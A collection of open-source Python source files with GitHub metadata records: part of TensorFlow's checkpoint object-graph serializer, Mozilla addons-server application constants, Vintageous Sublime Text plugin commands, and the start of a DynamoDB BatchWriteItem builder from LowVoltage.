or hasattr(trackable, "_create_or_restore_slot_variable")):
naming_scheme = _slot_variable_naming_for_optimizer(
optimizer_path=object_names[trackable])
slot_names = trackable.get_slot_names()
for slot_name in slot_names:
for original_variable_node_id, original_variable in enumerate(
non_slot_objects):
try:
slot_variable = trackable.get_slot(
original_variable, slot_name)
except (AttributeError, KeyError):
slot_variable = None
if slot_variable is None:
continue
slot_variable._maybe_initialize_trackable() # pylint: disable=protected-access
if slot_variable._checkpoint_dependencies: # pylint: disable=protected-access
# TODO(allenl): Gather dependencies of slot variables.
raise NotImplementedError(
"Currently only variables with no dependencies can be saved as "
"slot variables. File a feature request if this limitation "
"bothers you.")
if slot_variable in node_ids:
raise NotImplementedError(
"A slot variable was re-used as a dependency of a "
"Trackable object. This is not currently allowed. File a "
"feature request if this limitation bothers you.")
checkpoint_name = naming_scheme(
variable_path=object_names[original_variable],
slot_name=slot_name)
object_names[slot_variable] = checkpoint_name
slot_variable_node_id = len(trackable_objects)
node_ids[slot_variable] = slot_variable_node_id
trackable_objects.append(slot_variable)
slot_variable_proto = (
trackable_object_graph_pb2.TrackableObjectGraph
.TrackableObject.SlotVariableReference(
slot_name=slot_name,
original_variable_node_id=original_variable_node_id,
slot_variable_node_id=slot_variable_node_id))
slot_variables.setdefault(trackable, []).append(
slot_variable_proto)
return slot_variables
class ObjectGraphView(object):
"""Gathers and serializes an object graph."""
def __init__(self, root, saveables_cache=None):
"""Configure the graph view.
Args:
root: A `Trackable` object whose variables (including the variables
of dependencies, recursively) should be saved. May be a weak reference.
saveables_cache: A dictionary mapping `Trackable` objects ->
attribute names -> SaveableObjects, used to avoid re-creating
SaveableObjects when graph building.
"""
self._root_ref = root
self._saveables_cache = saveables_cache
def list_dependencies(self, obj):
# pylint: disable=protected-access
obj._maybe_initialize_trackable()
return obj._checkpoint_dependencies
# pylint: enable=protected-access
@property
def saveables_cache(self):
"""Maps Trackable objects -> attribute names -> list(SaveableObjects).
Used to avoid re-creating SaveableObjects when graph building. None when
executing eagerly.
Returns:
The cache (an object-identity dictionary), or None if caching is disabled.
"""
return self._saveables_cache
@property
def root(self):
if isinstance(self._root_ref, weakref.ref):
derefed = self._root_ref()
assert derefed is not None
return derefed
else:
return self._root_ref
def _breadth_first_traversal(self):
"""Find shortest paths to all dependencies of self.root."""
bfs_sorted = []
to_visit = collections.deque([self.root])
path_to_root = object_identity.ObjectIdentityDictionary()
path_to_root[self.root] = ()
while to_visit:
current_trackable = to_visit.popleft()
if isinstance(current_trackable, tracking.NotTrackable):
raise NotImplementedError(
("The object %s does not support object-based saving. File a "
"feature request if this limitation bothers you. In the meantime, "
"you can remove the dependency on this object and save everything "
"else.")
% (current_trackable,))
bfs_sorted.append(current_trackable)
for name, dependency in self.list_dependencies(current_trackable):
if dependency not in path_to_root:
path_to_root[dependency] = (
path_to_root[current_trackable] + (
base.TrackableReference(name, dependency),))
to_visit.append(dependency)
return bfs_sorted, path_to_root
def _add_attributes_to_object_graph(
self, trackable_objects, object_graph_proto, node_ids, object_names,
object_map):
"""Create SaveableObjects and corresponding SerializedTensor protos."""
named_saveable_objects = []
if self._saveables_cache is None:
# No SaveableObject caching. Either we're executing eagerly, or building a
# static save which is specialized to the current Python state.
feed_additions = None
else:
# If we are caching SaveableObjects, we need to build up a feed_dict with
# functions computing volatile Python state to be saved with the
# checkpoint.
feed_additions = {}
for checkpoint_id, (trackable, object_proto) in enumerate(
zip(trackable_objects, object_graph_proto.nodes)):
assert node_ids[trackable] == checkpoint_id
object_name = object_names[trackable]
if object_map is None:
object_to_save = trackable
else:
object_to_save = object_map.get(trackable, trackable)
if self._saveables_cache is not None:
cached_attributes = self._saveables_cache.setdefault(object_to_save, {})
else:
cached_attributes = None
for name, saveable_factory in (
object_to_save._gather_saveables_for_checkpoint().items()): # pylint: disable=protected-access
attribute = object_proto.attributes.add()
attribute.name = name
attribute.checkpoint_key = "%s/%s/%s" % (
object_name, _OBJECT_ATTRIBUTES_NAME, _escape_local_name(name))
if cached_attributes is None:
saveables = None
else:
saveables = cached_attributes.get(name, None)
if saveables is not None:
for saveable in saveables:
if attribute.checkpoint_key not in saveable.name:
# The checkpoint key for this SaveableObject is different. We
# need to re-create it.
saveables = None
del cached_attributes[name]
break
if saveables is None:
if callable(saveable_factory):
maybe_saveable = saveable_factory(name=attribute.checkpoint_key)
else:
maybe_saveable = saveable_factory
if isinstance(maybe_saveable, saveable_object_lib.SaveableObject):
saveables = (maybe_saveable,)
else:
# Figure out the name-based Saver's name for this variable. If it's
# already a SaveableObject we'd just get the checkpoint key back, so
# we leave full_name blank.
saver_dict = saveable_object_util.op_list_to_dict(
[maybe_saveable], convert_variable_to_tensor=False)
full_name, = saver_dict.keys()
saveables = tuple(saveable_object_util.saveable_objects_for_op(
op=maybe_saveable, name=attribute.checkpoint_key))
for saveable in saveables:
saveable.full_name = full_name
for saveable in saveables:
if attribute.checkpoint_key not in saveable.name:
raise AssertionError(
("The object %s produced a SaveableObject with name '%s' for "
"attribute '%s'. Expected a name containing '%s'.")
% (trackable, name, saveable.name,
attribute.checkpoint_key))
if cached_attributes is not None:
cached_attributes[name] = saveables
optional_restore = None
for saveable in saveables:
if optional_restore is None:
optional_restore = saveable.optional_restore
else:
optional_restore = optional_restore and saveable.optional_restore
if hasattr(saveable, "full_name"):
attribute.full_name = saveable.full_name
if isinstance(saveable, base.PythonStateSaveable):
if feed_additions is None:
assert self._saveables_cache is None
# If we're not caching saveables, then we're either executing
# eagerly or building a static save/restore (e.g. for a
# SavedModel). In either case, we should embed the current Python
# state in the graph rather than relying on a feed dict.
saveable = saveable.freeze()
else:
saveable_feed_dict = saveable.feed_dict_additions()
for new_feed_key in saveable_feed_dict.keys():
if new_feed_key in feed_additions:
raise AssertionError(
("The object %s tried to feed a value for the Tensor %s "
"when saving, but another object is already feeding a "
"value.")
% (trackable, new_feed_key))
feed_additions.update(saveable_feed_dict)
named_saveable_objects.append(saveable)
if optional_restore is None:
optional_restore = False
attribute.optional_restore = optional_restore
return named_saveable_objects, feed_additions
def _fill_object_graph_proto(self, trackable_objects,
node_ids,
slot_variables,
object_graph_proto=None):
"""Name non-slot `Trackable`s and add them to `object_graph_proto`."""
if object_graph_proto is None:
object_graph_proto = (
trackable_object_graph_pb2.TrackableObjectGraph())
for checkpoint_id, trackable in enumerate(trackable_objects):
assert node_ids[trackable] == checkpoint_id
object_proto = object_graph_proto.nodes.add()
object_proto.slot_variables.extend(slot_variables.get(trackable, ()))
for child in self.list_dependencies(trackable):
child_proto = object_proto.children.add()
child_proto.node_id = node_ids[child.ref]
child_proto.local_name = child.name
return object_graph_proto
def _serialize_gathered_objects(self, trackable_objects, path_to_root,
object_map=None):
"""Create SaveableObjects and protos for gathered objects."""
object_names = object_identity.ObjectIdentityDictionary()
for obj, path in path_to_root.items():
object_names[obj] = _object_prefix_from_path(path)
node_ids = object_identity.ObjectIdentityDictionary()
for node_id, node in enumerate(trackable_objects):
node_ids[node] = node_id
slot_variables = _serialize_slot_variables(
trackable_objects=trackable_objects,
node_ids=node_ids,
object_names=object_names)
object_graph_proto = self._fill_object_graph_proto(
trackable_objects=trackable_objects,
node_ids=node_ids,
slot_variables=slot_variables)
named_saveable_objects, feed_additions = (
self._add_attributes_to_object_graph(
trackable_objects=trackable_objects,
object_graph_proto=object_graph_proto,
node_ids=node_ids,
object_names=object_names,
object_map=object_map))
return named_saveable_objects, object_graph_proto, feed_additions
def serialize_object_graph(self):
"""Determine checkpoint keys for variables and build a serialized graph.
Non-slot variables are keyed based on a shortest path from the root saveable
to the object which owns the variable (i.e. the one which called
`Trackable._add_variable` to create it).
Slot variables are keyed based on a shortest path to the variable being
slotted for, a shortest path to their optimizer, and the slot name.
Returns:
A tuple of (named_variables, object_graph_proto, feed_additions):
named_variables: A dictionary mapping names to variable objects.
object_graph_proto: A TrackableObjectGraph protocol buffer
containing the serialized object graph and variable references.
feed_additions: A dictionary mapping from Tensors to values which should
be fed when saving.
Raises:
ValueError: If there are invalid characters in an optimizer's slot names.
"""
trackable_objects, path_to_root = self._breadth_first_traversal()
return self._serialize_gathered_objects(
trackable_objects, path_to_root)
def frozen_saveable_objects(self, object_map=None, to_graph=None):
"""Creates SaveableObjects with the current object graph frozen."""
trackable_objects, path_to_root = self._breadth_first_traversal()
if to_graph:
target_context = to_graph.as_default
else:
target_context = ops.NullContextmanager
with target_context():
named_saveable_objects, graph_proto, _ = self._serialize_gathered_objects(
trackable_objects,
path_to_root,
object_map)
with ops.device("/cpu:0"):
object_graph_tensor = constant_op.constant(
graph_proto.SerializeToString(), dtype=dtypes.string)
named_saveable_objects.append(
base.NoRestoreSaveable(
tensor=object_graph_tensor,
name=base.OBJECT_GRAPH_PROTO_KEY))
return named_saveable_objects
def objects_ids_and_slot_variables(self):
"""Traverse the object graph and list all accessible objects.
Looks for `Trackable` objects which are dependencies of
`root_trackable`. Includes slot variables only if the variable they are
slotting for and the optimizer are dependencies of `root_trackable`
(i.e. if they would be saved with a checkpoint).
Returns:
A tuple of (trackable objects, object -> node id, slot variables)
"""
trackable_objects, path_to_root = self._breadth_first_traversal()
object_names = object_identity.ObjectIdentityDictionary()
for obj, path in path_to_root.items():
object_names[obj] = _object_prefix_from_path(path)
node_ids = object_identity.ObjectIdentityDictionary()
for node_id, node in enumerate(trackable_objects):
node_ids[node] = node_id
slot_variables = _serialize_slot_variables(
trackable_objects=trackable_objects,
node_ids=node_ids,
object_names=object_names)
return trackable_objects, node_ids, slot_variables
def list_objects(self):
"""Traverse the object graph and list all accessible objects."""
trackable_objects, _, _ = self.objects_ids_and_slot_variables()
return trackable_objects
| {
"content_hash": "2a777a612add02e476cc51603bd0ff7c",
"timestamp": "",
"source": "github",
"line_count": 431,
"max_line_length": 105,
"avg_line_length": 44.0046403712297,
"alnum_prop": 0.6612886217441738,
"repo_name": "ghchinoy/tensorflow",
"id": "ba2387870182cef6e578c7b947f07a4957fdf22c",
"size": "18966",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tensorflow/python/training/tracking/graph_view.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3568"
},
{
"name": "Batchfile",
"bytes": "15317"
},
{
"name": "C",
"bytes": "699905"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "67022491"
},
{
"name": "CMake",
"bytes": "206499"
},
{
"name": "Dockerfile",
"bytes": "73602"
},
{
"name": "Go",
"bytes": "1585039"
},
{
"name": "HTML",
"bytes": "4680118"
},
{
"name": "Java",
"bytes": "836400"
},
{
"name": "Jupyter Notebook",
"bytes": "1665583"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "98194"
},
{
"name": "Objective-C",
"bytes": "94022"
},
{
"name": "Objective-C++",
"bytes": "175222"
},
{
"name": "PHP",
"bytes": "17600"
},
{
"name": "Pascal",
"bytes": "3239"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "48407007"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "4733"
},
{
"name": "Shell",
"bytes": "476920"
},
{
"name": "Smarty",
"bytes": "27495"
},
{
"name": "Swift",
"bytes": "56155"
}
],
"symlink_target": ""
} |
import re
from django.utils.translation import ugettext_lazy as _
from base import (
ADDON_DICT, ADDON_EXTENSION, ADDON_LPAPP, ADDON_PERSONA, ADDON_PLUGIN,
ADDON_SEARCH, ADDON_STATICTHEME, ADDON_THEME)
from olympia.versions.compare import version_int as vint
class App(object):
@classmethod
def matches_user_agent(cls, user_agent):
return cls.user_agent_string in user_agent
# Applications
class FIREFOX(App):
id = 1
shortername = 'fx'
short = 'firefox'
pretty = _(u'Firefox')
browser = True
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PLUGIN, ADDON_PERSONA, ADDON_STATICTHEME]
guid = '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}'
min_display_version = 3.0
# These versions were relabeled and should not be displayed.
exclude_versions = (3.1, 3.7, 4.2)
user_agent_string = 'Firefox'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
@classmethod
def matches_user_agent(cls, user_agent):
matches = cls.user_agent_string in user_agent
if ('Android' in user_agent or 'Mobile' in user_agent or
'Tablet' in user_agent):
matches = False
return matches
class THUNDERBIRD(App):
id = 18
short = 'thunderbird'
shortername = 'tb'
pretty = _(u'Thunderbird')
browser = False
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_LPAPP,
ADDON_PERSONA]
guid = '{3550f703-e582-4d05-9a08-453d09bdfdc6}'
min_display_version = 1.0
user_agent_string = 'Thunderbird'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class SEAMONKEY(App):
id = 59
short = 'seamonkey'
shortername = 'sm'
pretty = _(u'SeaMonkey')
browser = True
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PLUGIN, ADDON_PERSONA]
guid = '{92650c4d-4b8e-4d2a-b7eb-24ecf4f6b63a}'
min_display_version = 1.0
exclude_versions = (1.5,)
latest_version = None
user_agent_string = 'SeaMonkey'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class SUNBIRD(App):
"""This application is retired and should not be used on the site. It
remains as there are still some sunbird add-ons in the db."""
id = 52
short = 'sunbird'
shortername = 'sb'
pretty = _(u'Sunbird')
browser = False
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_LPAPP]
guid = '{718e30fb-e89b-41dd-9da7-e25a45638b28}'
min_display_version = 0.2
latest_version = None
user_agent_string = 'Sunbird'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class MOBILE(App):
"""Old Firefox for Mobile.
Not supported anymore, should not be added to APPS."""
id = 60
short = 'mobile'
shortername = 'fn'
pretty = _(u'Mobile')
browser = True
types = [ADDON_EXTENSION, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PERSONA]
guid = '{a23983c0-fd0e-11dc-95ff-0800200c9a66}'
min_display_version = 0.1
user_agent_string = 'Fennec'
platforms = 'mobile' # DESKTOP_PLATFORMS (set in constants.platforms)
class ANDROID(App):
# This is for the Android native Firefox.
id = 61
short = 'android'
shortername = 'an'
pretty = _(u'Firefox for Android')
browser = True
types = [ADDON_EXTENSION, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PERSONA]
guid = '{aa3c5121-dab2-40e2-81ca-7ea25febc110}'
min_display_version = 11.0
user_agent_string = 'Fennec'
# Mobile and Android have the same user agent. The only way to distinguish
# is by the version number.
user_agent_re = [re.compile('Fennec/([\d.]+)'),
re.compile('Android; Mobile; rv:([\d.]+)'),
re.compile('Android; Tablet; rv:([\d.]+)'),
re.compile('Mobile; rv:([\d.]+)'),
re.compile('Tablet; rv:([\d.]+)')]
platforms = 'mobile'
latest_version = None
@classmethod
def matches_user_agent(cls, user_agent):
for user_agent_re in cls.user_agent_re:
match = user_agent_re.search(user_agent)
if match:
v = match.groups()[0]
return vint(cls.min_display_version) <= vint(v)
class MOZILLA(App):
"""Mozilla exists for completeness and historical purposes.
Stats and other modules may reference this for history.
This should NOT be added to APPS.
"""
id = 2
short = 'mz'
shortername = 'mz'
pretty = _(u'Mozilla')
browser = True
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PLUGIN]
guid = '{86c18b42-e466-45a9-ae7a-9b95ba6f5640}'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class UNKNOWN_APP(App):
"""Placeholder for unknown applications."""
pretty = _(u'Unknown')
# UAs will attempt to match in this order.
APP_DETECT = (ANDROID, THUNDERBIRD, SEAMONKEY, FIREFOX)
APP_USAGE = (FIREFOX, THUNDERBIRD, ANDROID, SEAMONKEY)
APP_USAGE_STATICTHEME = (FIREFOX,)
APPS = {app.short: app for app in APP_USAGE}
APPS_ALL = {app.id: app for app in APP_USAGE + (MOZILLA, SUNBIRD, MOBILE)}
APP_IDS = {app.id: app for app in APP_USAGE}
APP_GUIDS = {app.guid: app for app in APP_USAGE}
APPS_CHOICES = tuple((app.id, app.pretty) for app in APP_USAGE)
APP_TYPE_SUPPORT = {}
for _app in APP_USAGE:
for _type in _app.types:
APP_TYPE_SUPPORT.setdefault(_type, []).append(_app)
# Fake max version for when we want max compatibility
FAKE_MAX_VERSION = '9999'
# The lowest maxVersion an app has to support to allow default-to-compatible.
D2C_MIN_VERSIONS = {
FIREFOX.id: '4.0',
SEAMONKEY.id: '2.1',
THUNDERBIRD.id: '5.0',
ANDROID.id: '11.0',
}
for _app in APPS_ALL.values():
_versions = list(getattr(_app, 'exclude_versions', []))
# 99 comes from the hacks we do to make search tools compatible with
# versions (bug 692360).
_versions.append(99)
_app.exclude_versions = tuple(_versions)
del _app, _type, _versions
| {
"content_hash": "99a97d18e103e05e581fa7c3aa0b2343",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 78,
"avg_line_length": 32.239583333333336,
"alnum_prop": 0.6411954765751212,
"repo_name": "harry-7/addons-server",
"id": "255578f4287b3efe14b56bf0527a06b27109297f",
"size": "6190",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/olympia/constants/applications.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "806148"
},
{
"name": "HTML",
"bytes": "673309"
},
{
"name": "JavaScript",
"bytes": "1066531"
},
{
"name": "Makefile",
"bytes": "821"
},
{
"name": "PLSQL",
"bytes": "1074"
},
{
"name": "PLpgSQL",
"bytes": "2381"
},
{
"name": "Python",
"bytes": "4647485"
},
{
"name": "SQLPL",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "9339"
},
{
"name": "Smarty",
"bytes": "1881"
}
],
"symlink_target": ""
} |
"""Assorted commands.
"""
import os
import threading
import sublime
import sublime_plugin
from Vintageous.state import _init_vintageous
from Vintageous.state import State
from Vintageous.vi import settings
from Vintageous.vi import cmd_defs
from Vintageous.vi.dot_file import DotFile
from Vintageous.vi.utils import modes
from Vintageous.vi.utils import regions_transformer
class _vi_slash_on_parser_done(sublime_plugin.WindowCommand):
def run(self, key=None):
state = State(self.window.active_view())
state.motion = cmd_defs.ViSearchForwardImpl()
state.last_buffer_search = (state.motion._inp or
state.last_buffer_search)
class _vi_question_mark_on_parser_done(sublime_plugin.WindowCommand):
def run(self, key=None):
state = State(self.window.active_view())
state.motion = cmd_defs.ViSearchBackwardImpl()
state.last_buffer_search = (state.motion._inp or
state.last_buffer_search)
# TODO: Test me.
class VintageStateTracker(sublime_plugin.EventListener):
def on_post_save(self, view):
# Ensure the carets are within valid bounds. For instance, this is a
# concern when `trim_trailing_white_space_on_save` is set to true.
state = State(view)
view.run_command('_vi_adjust_carets', {'mode': state.mode})
def on_query_context(self, view, key, operator, operand, match_all):
vintage_state = State(view)
return vintage_state.context.check(key, operator, operand, match_all)
def on_close(self, view):
settings.destroy(view)
class ViMouseTracker(sublime_plugin.EventListener):
def on_text_command(self, view, command, args):
if command == 'drag_select':
state = State(view)
if state.mode in (modes.VISUAL, modes.VISUAL_LINE,
modes.VISUAL_BLOCK):
if (args.get('extend') or (args.get('by') == 'words') or
args.get('additive')):
return
elif not args.get('extend'):
return ('sequence', {'commands': [
['drag_select', args], ['_enter_normal_mode', {
'mode': state.mode}]
]})
elif state.mode == modes.NORMAL:
# TODO(guillermooo): Dragging the mouse does not seem to
# fire a different event than simply clicking. This makes it
# hard to update the xpos.
if args.get('extend') or (args.get('by') == 'words'):
return ('sequence', {'commands': [
['drag_select', args], ['_enter_visual_mode', {
'mode': state.mode}]
]})
# TODO: Test me.
class ViFocusRestorerEvent(sublime_plugin.EventListener):
def __init__(self):
self.timer = None
def action(self):
self.timer = None
def on_activated(self, view):
if self.timer:
self.timer.cancel()
# Switching to a different view; enter normal mode.
_init_vintageous(view)
else:
# Switching back from another application. Ignore.
pass
def on_deactivated(self, view):
self.timer = threading.Timer(0.25, self.action)
self.timer.start()
class _vi_adjust_carets(sublime_plugin.TextCommand):
def run(self, edit, mode=None):
def f(view, s):
if mode in (modes.NORMAL, modes.INTERNAL_NORMAL):
if ((view.substr(s.b) == '\n' or s.b == view.size())
and not view.line(s.b).empty()):
return sublime.Region(s.b - 1)
return s
regions_transformer(self.view, f)
class Sequence(sublime_plugin.TextCommand):
"""Required so that mark_undo_groups_for_gluing and friends work.
"""
def run(self, edit, commands):
for cmd, args in commands:
self.view.run_command(cmd, args)
class ResetVintageous(sublime_plugin.WindowCommand):
def run(self):
v = self.window.active_view()
v.settings().erase('vintage')
_init_vintageous(v)
DotFile.from_user().run()
print("Package.Vintageous: State reset.")
sublime.status_message("Vintageous: State reset")
class ForceExitFromCommandMode(sublime_plugin.WindowCommand):
"""
A sort of a panic button.
"""
def run(self):
v = self.window.active_view()
v.settings().erase('vintage')
# XXX: What happens exactly when the user presses Esc again now? Which
# more are we in?
v.settings().set('command_mode', False)
v.settings().set('inverse_caret_state', False)
print("Vintageous: Exiting from command mode.")
sublime.status_message("Vintageous: Exiting from command mode.")
class VintageousToggleCtrlKeys(sublime_plugin.WindowCommand):
def run(self):
prefs = sublime.load_settings('Preferences.sublime-settings')
value = prefs.get('vintageous_use_ctrl_keys', False)
prefs.set('vintageous_use_ctrl_keys', (not value))
sublime.save_settings('Preferences.sublime-settings')
status = 'enabled' if (not value) else 'disabled'
print("Package.Vintageous: Use of Ctrl- keys {0}.".format(status))
sublime.status_message("Vintageous: Use of Ctrl- keys {0}"
.format(status))
class ReloadVintageousSettings(sublime_plugin.TextCommand):
def run(self, edit):
DotFile.from_user().run()
class VintageousOpenConfigFile(sublime_plugin.WindowCommand):
"""Opens or creates $packages/User/.vintageousrc.
"""
def run(self):
path = os.path.realpath(os.path.join(sublime.packages_path(),
'User/.vintageousrc'))
if os.path.exists(path):
self.window.open_file(path)
else:
with open(path, 'w'):
pass
self.window.open_file(path)
| {
"content_hash": "c0470cf05d169d017bb860d79b3ca3fe",
"timestamp": "",
"source": "github",
"line_count": 188,
"max_line_length": 78,
"avg_line_length": 32.1436170212766,
"alnum_prop": 0.597385404600364,
"repo_name": "vastcharade/Vintageous",
"id": "d183d123a999b015bfbb76065154e64996400405",
"size": "6043",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "xsupport.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PowerShell",
"bytes": "4212"
},
{
"name": "Python",
"bytes": "970962"
},
{
"name": "Shell",
"bytes": "657"
}
],
"symlink_target": ""
} |
"""
When given a :class:`BatchWriteItem`, the connection will return a :class:`BatchWriteItemResponse`:
>>> connection(
... BatchWriteItem().table(table).delete({"h": 0}, {"h": 1})
... )
<LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>
See also the :func:`.batch_put_item` and :func:`.batch_delete_item` compounds. And :ref:`actions-vs-compounds` in the user guide.
"""
import LowVoltage as _lv
import LowVoltage.testing as _tst
from .action import Action
from .conversion import _convert_dict_to_db
from .next_gen_mixins import proxy, variadic
from .next_gen_mixins import ReturnConsumedCapacity, ReturnItemCollectionMetrics
from .return_types import ConsumedCapacity, ItemCollectionMetrics, _is_dict, _is_list_of_dict
class BatchWriteItemResponse(object):
"""
BatchWriteItemResponse()
The `BatchWriteItem response <http://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_BatchWriteItem.html#API_BatchWriteItem_ResponseElements>`__.
"""
def __init__(
self,
ConsumedCapacity=None,
ItemCollectionMetrics=None,
UnprocessedItems=None,
**dummy
):
self.__consumed_capacity = ConsumedCapacity
self.__item_collection_metrics = ItemCollectionMetrics
self.__unprocessed_items = UnprocessedItems
@property
def consumed_capacity(self):
"""
The capacity consumed by the request. If you used :meth:`~BatchWriteItem.return_consumed_capacity_total` or :meth:`~BatchWriteItem.return_consumed_capacity_indexes`.
:type: ``None`` or list of :class:`.ConsumedCapacity`
"""
if _is_list_of_dict(self.__consumed_capacity):
return [ConsumedCapacity(**c) for c in self.__consumed_capacity]
@property
def item_collection_metrics(self):
"""
Metrics about the collection of the items you just updated. If a LSI was touched and you used :meth:`~BatchWriteItem.return_item_collection_metrics_size`.
:type: ``None`` or dict of string (table name) to list of :class:`.ItemCollectionMetrics`
"""
if _is_dict(self.__item_collection_metrics):
return {n: [ItemCollectionMetrics(**m) for m in v] for n, v in self.__item_collection_metrics.iteritems()}
@property
def unprocessed_items(self):
"""
Items that were not processed during this request.
If not None, you should give this back to:meth:`~BatchWriteItem.previous_unprocessed_items`
in a subsequent :class:`BatchWriteItem`.
The :func:`.batch_put_item` and :func:`.batch_delete_item` compounds do that for you.
:type: ``None`` or exactly as returned by DynamoDB
"""
return self.__unprocessed_items
class BatchWriteItem(Action):
"""
The `BatchWriteItem request <http://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_BatchWriteItem.html#API_BatchWriteItem_RequestParameters>`__.
"""
def __init__(self, table=None, put=[], delete=[]):
"""
Passing ``table`` (and ``put`` and ``delete``) to the constructor is like calling :meth:`table` on the new instance.
"""
super(BatchWriteItem, self).__init__("BatchWriteItem", BatchWriteItemResponse)
self.__previous_unprocessed_items = None
self.__tables = {}
self.__active_table = None
self.__return_consumed_capacity = ReturnConsumedCapacity(self)
self.__return_item_collection_metrics = ReturnItemCollectionMetrics(self)
if table is not None:
self.table(table, put, delete)
@property
def payload(self):
# @todo Simplify, make more linear
data = {}
if self.__previous_unprocessed_items:
data["RequestItems"] = self.__previous_unprocessed_items
if self.__tables:
data["RequestItems"] = {n: t.payload for n, t in self.__tables.iteritems()}
data.update(self.__return_consumed_capacity.payload)
data.update(self.__return_item_collection_metrics.payload)
return data
class _Table:
def __init__(self, action):
self.delete = []
self.put = []
@property
def payload(self):
items = []
if self.delete:
items.extend({"DeleteRequest": {"Key": _convert_dict_to_db(k)}} for k in self.delete)
if self.put:
items.extend({"PutRequest": {"Item": _convert_dict_to_db(i)}} for i in self.put)
return items
def table(self, name, put=[], delete=[]):
"""
Set the active table. Calls to methods like :meth:`delete` or :meth:`put` will apply to this table.
>>> connection(
... BatchWriteItem().table(table)
... .put({"h": 12}, {"h": 13})
... )
<LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>
If you pass a list of items as ``put``, they'll be added to the items to put in the table.
>>> connection(
... BatchWriteItem().table(table, put=[{"h": 12}, {"h": 13}])
... )
<LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>
If you pass a list of keys as ``delete``, they'll be added to the keys to delete from the table.
>>> connection(
... BatchWriteItem().table(table, delete=[{"h": 12}, {"h": 13}])
... )
<LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>
"""
if name not in self.__tables:
self.__tables[name] = self._Table(self)
self.__active_table = self.__tables[name]
self.put(*put)
self.delete(*delete)
return self
@variadic(dict)
def put(self, *items):
"""
Add items to put in the active table.
:raise: :exc:`.BuilderError` if called when no table is active.
>>> connection(
... BatchWriteItem().table(table)
... .put({"h": 12}, {"h": 13})
... )
<LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>
"""
self.__check_active_table()
self.__active_table.put.extend(items)
return self
@variadic(dict)
def delete(self, *keys):
"""
Add keys to delete from the active table.
:raise: :exc:`.BuilderError` if called when no table is active.
>>> connection(
... BatchWriteItem().table(table)
... .delete({"h": 12}, {"h": 13})
... )
<LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>
"""
self.__check_active_table()
self.__active_table.delete.extend(keys)
return self
def previous_unprocessed_items(self, previous_unprocessed_items):
"""
Set Table and items to retry previous :attr:`~BatchWriteItemResponse.unprocessed_items`.
The :func:`.batch_put_item` and :func:`.batch_delete_item` compounds do that for you.
Note that using this method is incompatible with using :meth:`table`, :meth:`put` or :meth:`delete`
or passing a ``table`` or ``put`` or ``delete`` in the constructor.
"""
self.__previous_unprocessed_items = previous_unprocessed_items
return self
@proxy
def return_consumed_capacity_total(self):
"""
>>> c = connection(
... BatchWriteItem().table(table)
... .delete({"h": 3})
... .return_consumed_capacity_total()
... ).consumed_capacity
>>> c[0].table_name
u'LowVoltage.Tests.Doc.1'
>>> c[0].capacity_units
2.0
"""
return self.__return_consumed_capacity.total()
@proxy
def return_consumed_capacity_indexes(self):
"""
>>> c = connection(
... BatchWriteItem().table(table)
... .delete({"h": 4})
... .return_consumed_capacity_indexes()
... ).consumed_capacity
>>> c[0].capacity_units
2.0
>>> c[0].table.capacity_units
1.0
>>> c[0].global_secondary_indexes["gsi"].capacity_units
1.0
"""
return self.__return_consumed_capacity.indexes()
@proxy
def return_consumed_capacity_none(self):
"""
>>> print connection(
... BatchWriteItem().table(table).delete({"h": 5})
... .return_consumed_capacity_none()
... ).consumed_capacity
None
"""
return self.__return_consumed_capacity.none()
@proxy
def return_item_collection_metrics_size(self):
"""
>>> m = connection(
... BatchWriteItem().table(table2)
... .put({"h": 0, "r1": 0, "r2": 0})
... .return_item_collection_metrics_size()
... ).item_collection_metrics
>>> m[table2][0].item_collection_key
{u'h': 0}
>>> m[table2][0].size_estimate_range_gb
[0.0, 1.0]
"""
return self.__return_item_collection_metrics.size()
@proxy
def return_item_collection_metrics_none(self):
"""
>>> print connection(
... BatchWriteItem().table(table2)
... .put({"h": 1, "r1": 0, "r2": 0})
... .return_item_collection_metrics_none()
... ).item_collection_metrics
None
"""
return self.__return_item_collection_metrics.none()
def __check_active_table(self):
if self.__active_table is None:
raise _lv.BuilderError("No active table.")
class BatchWriteItemUnitTests(_tst.UnitTests):
def test_name(self):
self.assertEqual(BatchWriteItem().name, "BatchWriteItem")
def test_empty(self):
